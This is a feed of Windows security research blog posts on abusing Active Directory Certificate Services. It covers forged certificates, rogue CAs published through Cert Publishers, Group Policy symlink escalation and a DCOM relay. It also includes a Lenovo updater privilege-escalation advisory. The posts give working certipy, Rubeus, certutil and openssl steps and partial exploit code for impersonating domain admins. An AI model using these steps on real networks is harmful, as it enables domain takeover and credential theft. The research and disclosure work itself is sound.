stateOrProvinceName = supplied
countryName = optional
emailAddress = optional
organizationName = supplied
organizationalUnitName = optional
[myca_extensions]
basicConstraints = CA:false
subjectKeyIdentifier = hash
authorityKeyIdentifier = keyid:always
keyUsage = digitalSignature,keyEncipherment
extendedKeyUsage = serverAuth
crlDistributionPoints = URI:http://192.168.1.88/root.crl

We need to run some openssl commands to produce the necessary files:

openssl genrsa -out cert.key 2048
#ensure that common name is different from your fake CA
openssl req -new -key cert.key -out cert.csr
touch certindex
echo 01 > certserial
echo 01 > crlnumber
openssl ca -batch -config ca.conf -notext -in cert.csr -out cert.crt
openssl pkcs12 -export -out cert.p12 -inkey cert.key -in cert.crt -chain -CAfile myfakeca.crt
openssl ca -config ca.conf -gencrl -keyfile myfakeca.key -cert myfakeca.crt -out rt.crl.pem
openssl crl -inform PEM -in rt.crl.pem -outform DER -out root.crl

Now that we finally have our root.crl file, all we need is to set up a minimalistic HTTP server:

python3 -m http.server 80

In certipy we need to specify our CRL distribution point:

certipy forge -ca-pfx myfakeca.pfx -upn [email protected] -subject 'CN=Administrator,OU=Accounts,OU=T0,OU=Admin,DC=mylab,DC=local' -crl 'http://192.168.1.88/root.crl'
Certipy v4.4.0 - by Oliver Lyak (ly4k)
[*] Saved forged certificate and private key to 'administrator_forged.pfx'
certipy auth -pfx administrator_forged.pfx  -dc-ip 192.168.212.21

Bingo! It works: the DC contacts our CRL distribution point and we are able to authenticate via PKINIT as a domain admin and get his NT hash… Let’s do it with Rubeus:
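A sketch of the Rubeus command line (parameters assumed):

Rubeus.exe asktgt /user:administrator /certificate:administrator_forged.pfx /domain:mylab.local /getcredentials /show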

It worked again! Let’s check if we can access the C$ share on the DC now:

At the end of our experiment, we can draw the following conclusions:

  • Having only write access to NTAuthCertificates is obviously not sufficient to perform a privilege escalation by using forged certificates issued by a fake CA for authentication. You might end up creating client authentication issues by removing the legitimate CA certificate from NTAuthCertificates
  • You need to add the fake CA to the trusted Certification Authorities and ensure that the local cache is populated on target Domain Controller
  • On a machine under your control, you need to set up a CRL distribution point (not sure if this can be skipped)
  • As I mentioned, this is a persistence technique that is not very stealthy: you can, for example, monitor 4768 events and verify the Certificate Issuer Name, monitor changes to the NTAuthCertificates object, etc…

And this is why, just for fun, I called this the “Silver” certificate 😉

CVE-2022-41099 - Analysis of a BitLocker Drive Encryption Bypass

By: itm4n
13 August 2023 at 22:00
In November 2022, an advisory was published by Microsoft about a BitLocker bypass. This vulnerability caught my attention because the fix required a manual operation by users and system administrators, even after installing all the security updates. Couple this with the fact that the procedure was not well documented initially, and you have the perfect recipe for disaster. This is typically th...

A Deep Dive into TPM-based BitLocker Drive Encryption

By: itm4n
14 September 2023 at 22:00
When I investigated CVE-2022-41099, a BitLocker Drive Encryption bypass through the Windows Recovery Environment (WinRE), the fact that the latter was able to transparently access an encrypted drive without requiring the recovery password struck me. My initial thought was that there had to be a way to reproduce this behavior and obtain the master key from the Recovery Environment (WinRE). The o...

CVE-2023-4632: Local Privilege Escalation in Lenovo System Updater

By: enigma0x3
26 October 2023 at 16:56

Version: Lenovo Updater Version <= 5.08.01.0009

Operating System Tested On: Windows 10 22H2 (x64)

Vulnerability: Lenovo System Updater Local Privilege Escalation via Arbitrary File Write

Advisory: https://support.lenovo.com/us/en/product_security/LEN-135367

Vulnerability Overview

The Lenovo System Update application is designed to allow non-administrators to check for and apply updates to their workstation. During the process of checking for updates, the privileged Lenovo Update application attempts to utilize C:\SSClientCommon\HelloLevel_9_58_00.xml, which doesn’t exist on the filesystem. Due to the ability for any low-privileged user to create a directory in the root of the C:\ drive, it’s possible to provide the privileged Lenovo System Update application a specially crafted HelloLevel_9_58_00.xml file, which is located in C:\SSClientCommon. This custom XML file contains a source and destination file path, which the Lenovo System Update application parses when the user checks for updates. Once parsed, the privileged Lenovo System Update application moves the source file to the destination location and allows for an arbitrary file write primitive, thus resulting in elevation of privilege to NT AUTHORITY\SYSTEM

Vulnerability Walkthrough

When a user checks for Lenovo updates via the Lenovo System Update application, Tvsukernel.exe is launched as the user Lenovo_tmp_<randomCharacters> in a privileged, High Integrity context. Upon execution, Tvsukernel.exe checks for HelloLevel_9_58_00.xml in C:\SSClientCommon, shown below in Figure 01.

Figure 01 – Missing Directory and XML File

By default, all versions of Windows allow for low-privileged users to create directories within the root of the C:\ drive. An attacker can manually create the directory C:\SSClientCommon\ and then place HelloLevel_9_58_00.xml within it, shown below in Figure 02.

Figure 02 — Directory and XML Creation in Root of C:\ Drive

After C:\SSClientCommon is created, an attacker can then create the required subdirectory C:\SSClientCommon\UTS, which will contain the attacker’s malicious binary. The directory structure for the attack looks similar to Figure 03 below:

Figure 03: Final Folder and File Structure

Since HelloLevel_9_58_00.xml resides in a location that an attacker can control, it is possible to craft a custom XML file that allows an attacker to move a file from one location to another. This is possible because the custom XML defines an “execute” action, providing a “Source” and “Destination” path. The “SourcePath” element defines a portable executable (PE) file located within C:\SSClientCommon\UTS, in this case C:\SSClientCommon\UTS\poc2.exe.

The “DestinationPath” node defines the location in which the source file is to be copied to, shown below in Figure 04:

Figure 04 – Custom XML Source and Destination Paths

After the Lenovo System Update application launches and checks for updates, the privileged process (i.e., Tvsukernel.exe) checks to see whether C:\SSClientCommon\HelloLevel_9_58_00.xml exists. Since the path has been created and a custom XML file planted, Tvsukernel.exe will move the custom HelloLevel_9_58_00.xml file to C:\ProgramData\Lenovo\SystemUpdate\sessionSE\system\SSClientCommon\HelloLevel_9_58_00.xml, shown below in Figure 05:

Figure 05: Writing Custom XML to ProgramData

Once the XML file is moved, Tvsukernel.exe calls the ParseUDF() function within Client.dll in order to parse the XML file located in C:\ProgramData\Lenovo\SystemUpdate\sessionSE\system\SSClientCommon\HelloLevel_9_58_00.xml. When Tvsukernel.exe parses the XML, it prepends the DestinationPath contained in the XML with C:\ProgramData\Lenovo\SystemUpdate\sessionSE\, shown below in Figure 06:

Figure 06: XML Parsing in ParseUDF()

In the custom attacker-controlled XML file, it is possible to use directory traversal to break out of the replaced C:\ProgramData\Lenovo\SystemUpdate\sessionSE\ DestinationPath value. An attacker can leverage this to choose any location on the operating system, thus resulting in an arbitrary file write primitive. In this case, directory traversal was used to set the DestinationPath value to C:\Program Files (x86)\Lenovo\System Update\SUService.exe, shown below in Figure 07. This is due to the fact that the Lenovo Updater tries to launch this application as NT AUTHORITY\SYSTEM each time the Lenovo System Updater is launched.

Figure 07: Directory Traversal in Custom XML

With the custom XML created and placed in C:\SSClientCommon\HelloLevel_9_58_00.xml and a malicious binary placed in C:\SSClientCommon\UTS\poc2.exe, an attacker can simply open the Lenovo System Update application and check for updates. Upon execution, Tvsukernel.exe will move the malicious C:\SSClientCommon\HelloLevel_9_58_00.xml to C:\ProgramData\Lenovo\SystemUpdate\sessionSE\system\SSClientCommon\HelloLevel_9_58_00.xml, parse it, and then move C:\SSClientCommon\UTS\poc2.exe to C:\Program Files (x86)\Lenovo\System Update\SUService.exe, overwriting the SUService.exe binary, shown below in Figure 08:

Figure 08: Overwriting Lenovo SUService.exe Service Binary

With Lenovo’s SUService.exe binary overwritten with a custom application, an attacker can close and re-open the Lenovo System Update application, which will cause the attacker’s application to execute as NT AUTHORITY\SYSTEM. In this case, poc2.exe gets the username of the currently executing user and writes it out to C:\Windows\POCOutput.txt, shown below in Figure 09:

Figure 09: Code Execution as NT AUTHORITY\SYSTEM

This vulnerability has been fixed in the latest version of the Lenovo System Updater application.

Lenovo’s Advisory can be found here: https://support.lenovo.com/us/en/product_security/LEN-135367

LocalPotato HTTP edition

By: Decoder
3 November 2023 at 16:54

Microsoft addressed our LocalPotato vulnerability in the SMB scenario with CVE-2023-21746 during the January 2023 Patch Tuesday. However, the HTTP scenario remains unpatched, as per Microsoft’s decision, and it is still effective on updated systems.

This is clearly an edge case, but it is important to be aware of it and avoid situations that could leave you vulnerable.

In this brief post, we will explain a possible method of performing an arbitrary file write with SYSTEM privileges starting from a standard user by leveraging the context swap in HTTP NTLM local authentication using the WEBDAV protocol.

For all the details about the NTLM Context swapping refer to our previous post.

Lab setup

First of all, we need to install IIS on our Windows machine and enable WebDAV. The following screenshot is taken from Windows 11, but the setup is quite similar on Windows servers as well.

Upon enabling WEBDAV, the next step is to create a virtual directory under our root website. In this instance, we’ll name it webdavshare and mount it, for the sake of simplicity, on the C:\Windows directory.

We need to permit read/write operations on this share by adding an authoring rule:

Last but not least, we need to enable NTLM authentication and disable all the other methods:

Exploiting context swapping with http/webdav

In our latest LocalPotato release, we have added and “hardcoded” this method with the HTTP/WebDAV protocol. The tool performs an arbitrary file write with SYSTEM privileges at the location specified in the WebDAV share, with the static content “we always love potatoes”. Refer to the source code for all the details, it’s not black magic 🙂

You can certainly modify the code and tailor it to your specific needs, depending on the situation you encounter 😉

A “deep dive” in Cert Publishers Group

By: Decoder
20 November 2023 at 17:03

While writing my latest post, my attention was also drawn to the Cert Publishers group, which is associated with the Certificate service (ADCS) in an Active Directory Domain.

I was wondering about the purpose of this group and what type of permissions were assigned to its members. I was also curious to understand if it was possible to exploit this membership to acquire the highest privileges within a domain. By default, this group contains the computer accounts hosting the Certification Authority and Sub CA. It is not clear whether this group should be considered really highly privileged, and I have not found any documentation of potential abuse. For sure, CA and SubCA Windows servers should be considered highly privileged, even just for the fact that they can do backups of the CA keys…

Last but not least, Microsoft does not protect this group by AdminSDHolder:

What is the purpose of Cert Publishers?

Microsoft’s official documentation on this group is not very clear nor exhaustive:

Members of the Cert Publishers group are authorized to publish certificates for User objects in Active Directory.

What does this mean? Members of the group have write access to the userCertificate attribute of users and computers and this permission is also controlled by the AdminSDholder configuration:

The userCertificate attribute is a multi-valued attribute that contains the DER-encoded X509v3 certificates issued to the user. The public key certificates issued to this user by the Microsoft Certificate Service are stored in this attribute if the “Publish to Active Directory” is set in the Certificate Templates, which is the default for several certificate templates:
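For reference, a quick way to inspect what has been published for a given account (a sketch assuming the RSAT ActiveDirectory module and a hypothetical user1 account):

(Get-ADUser user1 -Properties userCertificate).userCertificate |
    ForEach-Object { [System.Security.Cryptography.X509Certificates.X509Certificate2]::new($_) } |
    Select-Object Subject, NotAfter   # one object per DER-encoded certificate stored in the attribute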

Should you accept this default setting? In theory, this would be useful when using Email Encryption, Email Signing, or Encrypted Files System (EFS). I see no other reason and if you don’t need it remove this flag 😉

From the security perspective, as far as I know, no reasonable path could permit an attacker to elevate the privileges by altering the certificates stored in this attribute.

There could be in theory a denial of service attack by adding a huge amount of certificates to the attribute to create replication issues between DC’s, but in my tests, I was not able to reproduce this given that there seems to be a hard limit of around 1200 certificates (or maybe a limit on the size), at least in a Windows AD 2016.

So if you really need this attribute, at least check “Do not automatically reenroll..” which will prevent uncontrolled growth of this attribute.

Is there anything else they can do? Yes!

Permissions granted to cert Publishers in Configuration Partition

Cert Publishers have control over some objects located under the “Public Key Services” container of Configuration Partition of AD:

  • CN=AIA,CN=Public Key Services,CN=Services,CN=Configuration,DC=…

Authority Information Access (AIA) is used to indicate how to access information and services related to the issuer of the certificate.

From Pkisolutions:

This container stores the intermediate CA and cross-certificates. All certificates from this container are propagated to each client in the Intermediate Certification Authority certificates store via Group Policy.

Cert Publishers have full control over it, so they can create new entries with fake certificates via certutil or adsiedit, for example:

certutil -dspublish -f fakeca.crt subCA  (sub CA)
certutil -dspublish -f fakeca.crt crossCA  (cross CA)

But the resulting fake certificates published in the intermediate CA store will not be trusted due to the missing root CA, so this is probably not useful…
We have also to keep in mind that Cert Publishers cannot modify the original AIA object created during the installation of the CA:

  • CN=[CA_NAME],CN=CDP,CN=Public Key Services,CN=Services,CN=Configuration,DC= …

Certificate Revocation List Distribution Point (CDP) provides information on where to find the CRL associated with the certificate.

Members of Cert Publishers have full control over this container and its child objects. But what’s the purpose of this container in ADCS?

From Pkisolutions:
“This container is used to store certificate revocation lists (CRL). To differentiate CRLs a separate container is created for each CA. Typically CA host NetBIOS name is used. CRLs from CDP containers are NOT propagated to clients and is used only when a certificate refers to a particular CRLDistributionPoint entry in CDP container.”

Members could overwrite attributes of the existing objects, especially certificateRevocationList and deltaRevocationList, with fake ones, or just remove them. However, given that these configurations are not replicated to clients, these permissions are not very useful from an attacker’s perspective.

It’s worth noting that Cert Publishers cannot modify the extensions relative to AIA/CDP configuration of the CA server:

  • CN=[CA_NAME],CN=Certification Authorities,CN=Public Key Services,CN=Services,CN=Configuration,DC=..

This container stores trusted root certificates. The root certificate of the CA server is automatically placed inside and the certificates will be published (via GP) under the trusted root certification authorities.

While Cert Publishers have full control over the CA_NAME object, they are unable to add other certification authority objects. This restriction is probably in place to mitigate the risk of a malicious member of the group publishing fake CA certificates, which could potentially be trusted by all clients. Hence, what are the potential abuse scenarios to consider?

Abusing the Certification Authorities object

My objective was to explore potential workarounds to have my fake Certificate Authority (CA) published and accepted as trustworthy by all clients, despite the established limitations.

Following various tests, where I attempted to substitute the existing certificate stored in the caCertificate attribute of the CA object with a fake one, or to append a fake certificate to the current caCertificate (without success, as the fake CA was not published), I eventually identified a solution that circumvents the existing ‘safety’ (or should we say ‘security’?) boundary. Why not just create a fake CA with the exact same common name as the official one? If it works as expected, it will be appended to the existing CA’s configuration…

Creating a fake self-signed CA with the openssl tool is fairly straightforward, I won’t go into details as I already explained this in my previous post.

The provided common name matches the name of our official CA.

After obtaining the certificate, we will log in to the AD domain using the credentials of a user who is a member of Cert Publishers and proceed to add the certificate to the Certification Authorities container
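A sketch of the publish step (the file name matches the evilca.crt used later in this post):

certutil -dspublish -f evilca.crt RootCA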

We can safely ignore the error, and with adsiedit we can confirm that the certificate was added:

Let’s see if it works, but instead of waiting for the GPO refresh, we manually perform a gpupdate /force and look in the certificates of the local computer/user:

Bingo! We now have our fake Certificate Authority (CA) established as a trusted entity. To confirm its functionality, we’ll configure a web server with an SSL certificate issued by our CA.

In my instance, I used an IIS web server and requested an SSL certificate (you can do this in many different ways..) using the Certificates snap-in (I’ll omit some steps, as there is a huge documentation available on how to accomplish this)

Once we get our CSR file (evil.csr), we need to set up the CA configuration for the CRL endpoints and certificate signing.

[ca]
default_ca = EVILCA
[crl_ext]
authorityKeyIdentifier=keyid:always
[EVILCA]
dir = ./
new_certs_dir = $dir
unique_subject = no
certificate = ./evilca.crt
database = ./certindex
private_key = ./evilca.key
serial = ./certserial
default_days = 729
default_md = sha1
policy = myca_policy
x509_extensions = myca_extensions
crlnumber = ./crlnumber
default_crl_days = 729
default_md = sha256
copy_extensions = copy
[myca_policy]
commonName = supplied
stateOrProvinceName = optional
countryName = optional
emailAddress = optional
organizationName = supplied
[myca_extensions]
basicConstraints = CA:false
subjectKeyIdentifier = hash
authorityKeyIdentifier = keyid:always
keyUsage = digitalSignature,keyEncipherment
extendedKeyUsage = serverAuth
crlDistributionPoints = URI:http://192.168.1.88/root.crl

Run the usual commands:

openssl genrsa -out cert.key 2048
openssl req -new -key cert.key -out cert.csr
touch certindex
echo 01 > certserial
echo 01 > crlnumber
openssl ca -batch -config ca.conf -notext -in cert.csr -out cert.crt
openssl pkcs12 -export -out cert.p12 -inkey cert.key -in cert.crt -chain -CAfile evilca.crt
openssl ca -config ca.conf -gencrl -keyfile evilca.key -cert evilca.crt -out rt.crl.pem
openssl crl -inform PEM -in rt.crl.pem -outform DER -out root.crl

We are now ready to process the certificate request:
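A sketch of the signing step, assuming the CSR exported from the web server was saved as evil.csr:

openssl ca -batch -config ca.conf -notext -in evil.csr -out evil.crt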

Then we import evil.crt on our web server. From a domain-joined machine, we try to navigate to https://myevilserver.mylab.local:

As expected, the site is trusted by our fake CA.

A forged trusted certificate could empower a malicious actor to execute various attacks, potentially resulting in the compromise of the entire domain by issuing any type of certificate, which will then be trusted…

While I’m not an expert on these abuses, here are some initial considerations:

  • Man in the middle (MITM) attacks such as SSL inspection to decrypt all the traffic
  • Code signing of malicious enterprise applications or script
  • Server authentication, VPN,…

Moving further

But let’s go a step further. Remember my so-called Silver Certificate?

To be able to (ab)use a forged client certificate for authentication, via PKINIT or Schannel, the CA also has to be present in the NTAuthCertificates store.

Let’s consider the scenario where the Cert Publishers group is granted write access to the NTAuthcertificates object. While not the default setting, I’ve encountered a couple of real-world scenarios where this (mis)configuration was implemented. This transforms the original situation described in my previous post, by having only write permission on NTAuthcertificates, from a mere persistence technique to a genuine privilege escalation. This shift is noteworthy, especially considering that we already have a trusted Certificate Authority at our disposal, enabling the forging of client certificates.

All we need at this point is to add our fake CA certificate to the NTAuthcertificates object (assuming Cert Publishers have been granted this permission)

Let’s wait for the GP refresh on the Domain Controllers and then proceed as usual using for example the certipy tool:

certipy forge -ca-pfx evilca.pfx -upn [email protected] -subject 'CN=Administrator,CN=Users,DC=mylab,DC=local' -crl 'http://192.168.1.88/root.crl'
certipy auth -pfx administrator_forged.pfx -dc-ip 192.168.212.21

And get the expected result!

Conclusions

At the end of our experiments, we can derive the following conclusions:

  • Members of Cert Publishers can add a malicious Certification Authority under their control to an ADCS environment, which will subsequently be trusted by all the clients. While certificates issued under this CA will not be automatically trusted for client authentication via PKINIT or SChannel, they could still be abused for other malicious tasks.
  • Cert Publishers membership + write access to NTAuthcertificates is the most dangerous mix in these scenarios. You can then forge and request a certificate, the Silver++ 🙂 , for client authentication against any user in the domain.
  • Cert Publishers should be considered High-Value Targets (or Tier-0 members), and membership in this group should be actively monitored, along with possible attack paths originating from non-privileged users leading to this group.

That’s all 😉

Insomni'hack 2024 CTF Teaser - Cache Cache

By: itm4n
20 January 2024 at 23:00
Last year, for the Insomni’hack 2023 CTF Teaser, I created a challenge based on a logic bug in a Windows RPC server. I was pleased with the result, so I renewed the experience. Besides, I already knew what type of bug to tackle for this new edition. :smiling_imp: Personal thoughts Like my previous write-up, I will begin with some thoughts about the difficulties of creating a challenge and fac...

Do not trust this Group Policy!

By: Decoder
23 January 2024 at 08:03

Sometimes I think that starting with a hypothetical scenario can be better than immediately diving into the details of a vulnerability. This approach, in my opinion, provides crucial context for a clearer understanding, especially when the vulnerability is easy to understand but the scenario where it could apply is not.

This post is about possible abuse of a group policy configuration for Local Privilege Escalation, very similar to the one I already reported and MS fixed with CVE-2022-37955.

First scenario

So we have our Active Directory domain MYLAB.LOCAL with several Group Policies. Any domain user can by default access the SYSVOL share, stored in this case \\mylab.local\sysvol\mylab.local\Policies, and read the configurations of the group policies.

At some point, our attention is caught by a “Files” preference group policy identified by the Files.xml file and located under the Machine context:

The Files policy is used for performing file operations such as copying or deleting one or more files from a source folder to a destination folder. The source and destination can be paths or UNC names and the operation can be performed under the Machine context or the logged-on user context if you specify it.

What actions does this policy perform on files? A thorough analysis of the contents of Files.xml can offer a clear understanding:

The configuration specifies that the file agentstartup.log, residing in the local C:\ProgramData\Agent\Logs directory, should be copied to a hidden server share logfilecollector$ within the agentstartup folder on the server. The destination filename on the server will be derived from the computer name.

This policy has been configured to copy the log files produced during the startup phase of an agent running on the domain computers to a centralized location. Alternatively, a group policy startup script executing identical copy operations could also be employed and would yield the same outcome.

When will the policy be processed? Running under the Machine context, it is processed at startup and also on demand by performing a gpupdate /force command. This share should be writable by the computer accounts where the policy is applied.

This is what the policy, configured by an administrator, would look like:

And this is how the file server should have been configured. In this case, the directory located on the share is accessible by Domain Users in read-only but Domain Computers have modify permissions as expected:

There’s also another interesting user, logfileoperator, who has modify permissions too:

This account is responsible for managing log files. As a Domain User we can also look at the contents of the folder:

The policy is also applied to the file server share which hosts the destination files.

By putting all the pieces together the question is: what potential consequences could arise if this user account, logfileoperator, is compromised by an attacker? Is there any possibility of privilege escalation?

The logfileoperator account can RDP to the file server (SRV1-MYLAB in this case) as a low-privileged user to perform his maintenance tasks.

Let’s assume that our attacker, impersonating logfileoperator, gains access to SRV1-MYLAB.

Let’s check the source directory:

The default security settings of the ProgramData directory have not been modified, so low-privileged users can modify the contents of the Logs directory…

This scenario would be perfect for a very simple and easy escalation path by abusing the well-known symlink creation tricks via the NT Object Manager.

To summarize:

  • Delete c:\programdata\Agent\Logs\agentstartup.log
  • Put a malicious dll in this folder and name it agentstartup.log
  • Delete contents of c:\logfilecollector\agentstartup
  • create a symlink for the target file SRV1-MYLAB.log pointing to destination C:\windows\System32\myevil.dll
  • Performing then a gpupdate /force will trigger the group policy which will copy our malicious agentstartup.log by following the symlink configured in SRV1-MYLAB.log to the destination c:\windows\system32\myevil.dll with SYSTEM privileges, given that the entire file copy operation is performed locally under the Machine context.

However, we currently face an issue. A few years ago, MS introduced the “Redirection Trust” feature to address redirection attacks, particularly during group policy processing. This feature prevents a privileged process from reparsing a mount point created by a lower privileged process:

In Group Policy Client policy service (gpsvc) this feature is enforced.

But wait, our destination file is specified as UNC share and not a local drive, will Redirection Trust still work in this local scenario?

Guess what, it does not work! Our dll has been successfully copied:

We can see the successful operations in Procmon tool:

It turns out that the mitigation is not effective on shares. James Forshaw already mentioned this in an old tweet:

Yes, it works on all the newest and updated versions of Windows as of now, Insider builds included:

And no, I won’t explain again how someone could misuse an arbitrary file write with SYSTEM privileges. 😉

Second Scenario

Let’s explore another hypothetical scenario. This time the administrator has setup this Folder policy:

The policy, executed within the user configuration, will remove the logs folder along with all its files and subfolders located on the share \\127.0.0.1\EXPORTS\%username%, dynamically expanded to match the currently logged-in user.

The question arises: why does this configuration involve the localhost share?

Consider a scenario in our domain where a special folder containing user data is shared on all domain computers. The share name is \\<computername>\exports\<username>, but the physical path may vary for each computer. At some point, there is the requirement to create a policy for deleting a folder under this share (in this case, “logs”). The Folder preference suits our needs perfectly, but we want to use only one policy configuration and avoid specifying the physical path, which can differ. Instead, we opt for using the common share name \\127.0.0.1\… (localhost).

By default, the delete operation is performed under the SYSTEM account (unless configured to run under the user’s context). This default behavior aligns with our requirement, guaranteeing that the folder is removed regardless of the user’s permissions.

But again, this could lead to abuse, right? What if we redirect the folder to be deleted to a target folder inaccessible to the user?

Let’s see what could happen:

Our user has his own shared folder, and its contents are under his control.

In this scenario, our previous c:\programdata\Agent folder also contains another subdirectory, Updater, which stores the executable for the Agent updater. Unlike the parent Agent folder, Updater is obviously read-only for users, because the updater runs with SYSTEM privileges…

So what’s the possible abuse? Can we transform an arbitrary folder delete into a privilege escalation? Let’s try it by creating a junction pointing to c:\programdata\agent and performing a gpupdate:
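A minimal sketch of the junction setup, assuming the share’s physical path on this computer is C:\EXPORTS\user1 (a hypothetical path):

rmdir /s /q C:\EXPORTS\user1\logs
mklink /J C:\EXPORTS\user1\logs C:\ProgramData\Agent

Junction creation requires no special privilege, and the policy will happily follow it when deleting the “logs” folder.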

It worked as expected: a share was specified as the target folder, the redirection mitigation did not kick in, and we were able to delete the Updater folder as well. The last step would be to recreate the Updater folder, put a malicious exe inside, name it AgentUpdater.exe, trigger or wait for our agent to perform an update, and we have SYSTEM access…

Conclusions

This was merely a hypothetical scenario, but I presume there are other real-world situations very similar to this, don’t you agree?

For example if “Group Policy Logging and Tracing” log files are saved on a shared folder:

Hint: when the log file size exceeds 1024 KB, it will be saved as .bak and a new log file will be created. However, I’ll leave this exercise to the reader 😉

There is one limitation to exploiting this security bypass. The shared folder that will be redirected and contains the symlink must be a subfolder of the share; otherwise, you will encounter a “device not ready” error.

Should this be considered a misconfiguration vulnerability or software (ie: logic bug) vulnerability?

Hard to say, I obviously reported this to MSRC:

  • December 29, 2023: Initial submission.
  • January 11, 2024: MSRC responded, stating that the case did not meet the criteria for servicing as it necessitates “Administrator and extensive user interaction.” (????) They closed the case but indicated a possibility of revisiting it if additional information impacting the investigation could be provided.
  • January 11, 2024: I answered, providing a more detailed explanation of the scenario and attached a video. I emphasized that it does not require administrator interaction, as the issue revolves around exploiting an existing group policy with this configuration. Side note: If someone could clarify what MSRC means by “Administrator interaction is required”, I would be more than happy to correct my post and give due mention
  • January 15, 2024: No response from MSRC. I sent an email with the draft of this post attached, informing them that my intention is to publish it in the absence of their feedback
  • January 22, 2024: MSRC told me that “they looked over the article and had no concerns or corrections”. Cool, appreciate it 🙂
  • January 23, 2024: Post published.

I find it perplexing that MSRC couldn’t offer a more comprehensive justification for their decision, instead of the given one that implies it would need Administrator (???) interaction.

Well, it is what it is, I won’t be organizing a dramatic exit just because of this tiny inconvenience 😉

If MS won’t (silently) fix this issue here are my 2 cents to save the world from potential catastrophe:

  • Carefully evaluate permissions on source and destination files/folders when performing operations that involve creation or deletion operations via group policy
  • If the destination is a share, a red flag should be raised. Possibly avoid this configuration, if really necessary, follow the whole process logic and ask yourself at each step if it could be abused by placing a redirection.

That’s all 🙂 ..and thanks to Robin @ipcdollar1 for the review

A Practical Guide to PrintNightmare in 2024

By: itm4n
27 January 2024 at 23:00
Although PrintNightmare and its variants were theoretically all addressed by Microsoft, it is still affecting organizations to this date, mainly because of quite confusing group policies and settings. In this blog post, I want to shed a light on those configuration issues, and hopefully provide clear guidance on how to remediate them. “PrintNightmare” and “Point and Print” Unless you’ve been ...

Extracting PEAP Credentials from Wired Network Profiles

By: itm4n
24 February 2024 at 23:00
A colleague of mine recently found himself in a situation where he had physical access to a Windows machine connected to a wired network using 802.1X and saved user credentials for the authentication. Naturally, he wanted to extract those credentials. Nothing extraordinary about that you might think, and yet, there was a twist… Where to start? For this blog post, I will assume the reader is a...

Hello: I’m your ADCS server and I want to authenticate against you

By: Decoder
26 February 2024 at 15:50

In my exploration of all the components and configurations related to the Windows Active Directory Certification Services (ADCS), after the “deep dive” in Cert Publishers group, I decided to take a look at the “Certificate Service DCOM Access” group.

This group is a built-in local security group. Whenever a server assumes the role of a Certification Authority (CA) by installing the Active Directory Certification Services (ADCS) role, the group is populated with the special NT AUTHORITY\Authenticated Users identity group, which represents every domain user account that can successfully log on to the domain.

The “DCOM Access” is somewhat intriguing; it evokes potential vulnerabilities and exploitation 😉

But let’s start from the beginning. What’s the purpose of this group? MS says: “Members of this group are allowed to connect to Certification Authorities in the enterprise“.

In simpler terms, this group can enroll certificates via DCOM. Thus, it’s logical that all authenticated users and computers have access to the specific application.

Each time a user or computer enrolls or auto enrolls a certificate, it contacts the DCOM interfaces of the CertSrv Request application which are exposed through the MS-WCCE protocol, the Windows Client Certificate Enrollment Protocol.

There is also a specific set of interfaces for Certificate Services Remote Administration Protocol described in MS-CSRA.

I won’t delve into the specifics of these interfaces. Maybe there are interesting interfaces to explore and abuse, but for now, my focus was drawn to the activation permissions of this DCOM server.

The DCOMCNFG tool provides us a lot of useful info.

At the computer level, the Certificate Service DCOM Access group is “limited” to Local and Remote Launch permissions:

This does not mean that this group can activate all the DCOM objects; we have to look at the specific application, CertSrv Request in our case:

Everyone can remotely activate this DCOM server. To be honest, I would have expected to find the Certificate Service DCOM Access group here instead of Everyone, given that this group is limited to Local Launch and Local Activation permissions:

Maybe some kind of combined permissions and nested memberships are also evaluated.

There’s another interesting aspect as well: from what I observed, the Certificate Service DCOM Access group is one of the few groups, along with Distributed COM Users and Performance Log Users, that are granted Remote Activation permissions.

Let’s take a look at identity too:

This DCOM application impersonates the SYSTEM account, which is what we need because it represents the highest local privileged identity.

So, we have a privileged DCOM server running that can be activated remotely by any authenticated domain user. This seems prone to our loved *potato exploits, don’t you think?

In summary, most of these exploits rely on abusing a DCOM activation service, running under a highly privileged context, by unmarshalling an IStorage object and reflecting the NTLM authentication back to a local RPC TCP endpoint to achieve local privilege escalation.

There are also variants of this attack that involve relaying the NTLM (and Kerberos) authentication of a user or computer to a remote endpoint using protocols such as LDAP, HTTP, or SMB, ultimately enabling privilege escalation up to Domain Admin. And this is what @splinter_code and I did in our RemotePotato0.

But this scenario is different, as a low-privileged domain user, we want to activate a remote DCOM application running under a high-privileged context and force it to authenticate against a remote listener running on our machine so that we can capture and relay this authentication to another service.

We will (hopefully) get the authentication of the remote computer itself when the DCOM application is running under the SYSTEM or Network Service context.

Sounds great! Now, what specific steps should we take to implement this?

Well, it is much simpler than I initially thought 🙂

Starting from the original JuicyPotato I made some minor changes:

  • Set up a redirector (socat) on a Linux machine, listening on port 135 and redirecting all traffic to a dedicated port (e.g. 9999) on our attacker machine. You certainly know that we can no longer specify a custom port for Oxid Resolution 😉 .
  • In JuicyPotato code:
    • Initialize a COSERVERINFO structure and specify the IP address of the remote server where we want to activate the DCOM object (the ADCS server)
    • Initialize a COAUTHIDENTITY and populate the username, password, and domain attributes.
    • Assign the COAUTHIDENTITY to the COSERVERINFO structure
    • In IStorageTrigger::MarshalInterface, specify the redirector IP address
    • In CoGetInstanceFromIStorage(), pass the COSERVERINFO structure (a simplified sketch of these changes follows):
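A rough, simplified C++ sketch of those changes (this is not the actual POC code: user, domain, password, and server names are made-up values, and the marshalled IStorage trigger object comes from the original JuicyPotato sources):

#include <windows.h>
#include <objbase.h>
#include <wchar.h>

// Hypothetical sketch: remotely activate a DCOM object on the ADCS server with explicit
// credentials, pointing OXID resolution at our redirector. Error handling omitted for brevity.
HRESULT TriggerRemoteActivation(IStorage* pTriggerStorage, CLSID clsid)
{
    // Credentials of our low-privileged domain user (assumed values)
    COAUTHIDENTITY authIdentity = {};
    authIdentity.User           = (USHORT*)L"user1";
    authIdentity.UserLength     = (ULONG)wcslen(L"user1");
    authIdentity.Domain         = (USHORT*)L"MYLAB";
    authIdentity.DomainLength   = (ULONG)wcslen(L"MYLAB");
    authIdentity.Password       = (USHORT*)L"Passw0rd!";
    authIdentity.PasswordLength = (ULONG)wcslen(L"Passw0rd!");
    authIdentity.Flags          = SEC_WINNT_AUTH_IDENTITY_UNICODE;

    // Explicit authentication info used for the remote activation request
    COAUTHINFO authInfo = {};
    authInfo.dwAuthnSvc           = RPC_C_AUTHN_WINNT;
    authInfo.dwAuthzSvc           = RPC_C_AUTHZ_NONE;
    authInfo.dwAuthnLevel         = RPC_C_AUTHN_LEVEL_CONNECT;
    authInfo.dwImpersonationLevel = RPC_C_IMP_LEVEL_IMPERSONATE;
    authInfo.pAuthIdentityData    = &authIdentity;

    // Remote server hosting the CertSrv Request DCOM application (the ADCS server)
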